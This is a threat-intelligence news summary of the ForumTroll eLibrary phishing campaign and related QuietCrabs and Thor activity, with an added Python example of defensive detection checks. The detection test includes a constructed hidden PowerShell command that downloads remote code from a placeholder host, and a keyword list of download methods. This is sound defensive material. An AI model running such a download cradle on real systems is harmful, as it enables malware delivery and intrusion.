ForumTroll Hits Russian Academics with Fake eLibrary Emails

December 17, 2025 at 12:00 AM

Kaspersky has linked the Operation ForumTroll threat actor to a new phishing wave aimed at Russian academics, shifting from earlier organization-focused attacks to highly targeted individuals in political science, international relations, and global economics. The campaign was detected in October 2025, and the group’s origin remains unknown.

How the lure works

  • Spoofed eLibrary emails appear to come from "support@e-library[.]wiki"
  • The domain was registered in March 2025 and aged to look legitimate, then used to host a clone of the real eLibrary homepage ("elibrary[.]ru")
  • Emails contain one-time-use links that download a personalized ZIP named ".zip"
  • If revisited, the link shows a Russian-language error; non-Windows users are told to try again on Windows
  • The archive holds a Windows LNK shortcut that launches PowerShell, pulling a payload from a remote server
  • The payload retrieves a final-stage DLL, establishes persistence via COM hijacking, and displays a decoy PDF
  • Final payload: Tuoni, a C2 and red-teaming framework that grants remote access to the victim’s Windows device
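The delivery chain above (spoofed sender, ZIP carrying an LNK, LNK spawning PowerShell, COM-hijack persistence) lends itself to a few simple defender-side checks. The block below is an added example written for this page; it is not code from Kaspersky, The Hacker News or the ForumTroll report. Everything it operates on is constructed: the sample From: addresses, an in-memory ZIP built by `build_sample_zip`, Sysmon-style process events as dicts, and two registry-like CLSID snapshots. The only values taken from the page are the two domains (`e-library[.]wiki`, `elibrary[.]ru`, written undefanged here so they can be matched). The page does not name the hijacked CLSID, so the COM check looks for the generic pattern of a per-user `InprocServer32` shadowing a machine-wide one; all function names are the example's own.

```python
"""Defender-side checks for the ForumTroll eLibrary delivery chain (added example)."""
import io
import re
import zipfile

# Real site being imitated and the spoofed sender domain named in the report.
LEGIT_DOMAIN = "elibrary.ru"
KNOWN_LURE_DOMAINS = {"e-library.wiki"}

# Command-line fragments that indicate PowerShell fetching something remote.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "net.webclient", "http://", "https://")


def brand_label(domain: str) -> str:
    """Reduce a domain to its brand label so 'e-library.wiki' and 'elibrary.ru' compare equal."""
    return re.sub(r"[^a-z0-9]", "", domain.lower().split(".")[0])


def classify_sender(address: str) -> str:
    """Return 'legit', 'known-lure', 'lookalike' or 'unrelated' for a From: address."""
    domain = address.rsplit("@", 1)[-1].lower()
    if domain == LEGIT_DOMAIN:
        return "legit"
    if domain in KNOWN_LURE_DOMAINS:
        return "known-lure"
    if brand_label(domain) == brand_label(LEGIT_DOMAIN):
        return "lookalike"          # same brand label on another registrable domain
    return "unrelated"


def build_sample_zip(members: dict) -> bytes:
    """Constructed ZIP standing in for the downloaded archive (member names are made up)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def archive_lnk_members(data: bytes) -> list:
    """List members that are Windows shortcuts; the report's archive carries one LNK."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [n for n in zf.namelist() if n.lower().endswith(".lnk")]
    except zipfile.BadZipFile:
        return []                   # not an archive at all, nothing to inspect


def flag_process_event(ev: dict) -> bool:
    """explorer.exe -> powershell.exe with a download in the command line matches the LNK stage."""
    parent = ev.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("command_line", "").lower()
    if parent != "explorer.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return False
    return any(hint in cmd for hint in DOWNLOAD_HINTS)


def hkcu_com_overrides(hklm_clsids: dict, hkcu_clsids: dict) -> dict:
    """COM hijacking pattern: HKCU InprocServer32 for a CLSID that HKLM already defines.

    The user hive is consulted first, so a per-user entry pointing at a different DLL
    silently replaces the legitimate server. Snapshots are {clsid: dll_path}.
    """
    return {clsid: path for clsid, path in hkcu_clsids.items()
            if clsid in hklm_clsids and path.lower() != hklm_clsids[clsid].lower()}


if __name__ == "__main__":
    print(classify_sender("support@e-library.wiki"))            # known-lure
    sample = build_sample_zip({"invitation.lnk": b"L\x00\x00\x00", "readme.txt": b"hi"})
    print(archive_lnk_members(sample))                           # ['invitation.lnk']
    event = {"parent_image": r"C:\Windows\explorer.exe",         # constructed event
             "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             "command_line": "powershell -w hidden (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"}
    print(flag_process_event(event))                             # True
    hklm = {"{00000000-0000-0000-0000-000000000001}": r"C:\Windows\System32\legit.dll"}
    hkcu = {"{00000000-0000-0000-0000-000000000001}": r"C:\Users\u\AppData\Roaming\x.dll"}
    print(hkcu_com_overrides(hklm, hkcu))                        # the shadowed CLSID
```

The process check deliberately keys on the parent being `explorer.exe`, which is what a double-clicked shortcut produces; scheduled or scripted PowerShell runs have other parents and would need a separate rule. The COM check only compares snapshots, so it is equally usable on exported registry hives from a suspect machine.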

Campaign context

  • Earlier ForumTroll operations exploited a Chrome zero-day (CVE-2025-2783) to deliver the LeetAgent backdoor and Dante spyware
  • Targeting has focused on Russia and Belarus since at least 2022, and Kaspersky assesses the group will continue pursuing entities and individuals of interest in these countries

Related threat activity highlighted by Positive Technologies

  • QuietCrabs (suspected Chinese; also tracked as UTA0178 and UNC5221)
    • Exploits: Microsoft SharePoint (CVE-2025-53770), Ivanti EPMM (CVE-2025-4427, CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), Ivanti Sentry (CVE-2023-38035)
    • Chain: ASPX web shell → JSP loader → KrustyLoader → Sliver implant
  • Thor (active since May 2025, observed in attacks on Russian companies)
    • Uses LockBit and Babuk ransomware as final payloads
    • Leverages Tactical RMM and MeshAgent to maintain persistence

Bottom line

ForumTroll’s eLibrary-themed phishing shows careful preparation, realistic lures, and a tightly controlled delivery chain designed to evade detection and ensure Windows-only execution, culminating in full remote access via Tuoni. The continued activity of QuietCrabs and Thor underscores broader exploitation of enterprise software and the sustained ransomware threat landscape.

Source: The Hacker News
